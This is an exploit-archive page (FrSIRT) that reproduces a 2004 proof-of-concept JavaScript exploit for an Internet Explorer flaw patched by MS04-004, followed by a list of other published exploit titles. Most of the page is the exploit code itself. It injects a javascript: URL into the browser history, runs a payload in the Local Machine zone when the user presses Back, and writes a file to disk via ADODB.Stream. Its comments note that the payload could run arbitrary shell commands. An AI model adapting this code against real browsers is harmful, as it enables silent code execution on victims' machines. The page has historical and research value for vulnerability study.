FrSIRT - Internet Explorer url javascript injection in history list (MS04-004)

English

Internet Explorer url javascript injection in history list (MS04-004)
Date : 04/02/2004

// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands. 
// This demo simply creates a harmless textfile on the desktop.
function payload() {
 file = "sandblad.txt";
 o = new ActiveXObject("ADODB.Stream");
 o.Open();
 o.Type=2;
 o.Charset="ascii";
 o.WriteText("You are vulnerable!");
 o.SaveToFile(file, 2);
 o.Close();
 alert("File "+file+" created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
 if (history.length != len)
 payload();
 else
 return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
 location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
 backbutton();

LATEST EXPLOITS / DERNIERS EXPLOITS :

- ProZilla "ftpsearch" Results Handling Client-Side Buffer Overflow Exploit
- Realplayer and Helix Player RP/RT Handling Format String Exploit
- GNU Mailutils imap4d "search" Command Remote Format String Exploit
- Mozilla Suite - Firefox - Netscape IDN Host Buffer Overflow Exploit
- Snort <= 2.4.0 TCP Options Handling Remote Denial of Service Exploit
- GNU Mailutils imap4d "search" Command Remote Format String Exploit
- Raxnet Cacti "graph_image.php" Remote Command Execution Exploit
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit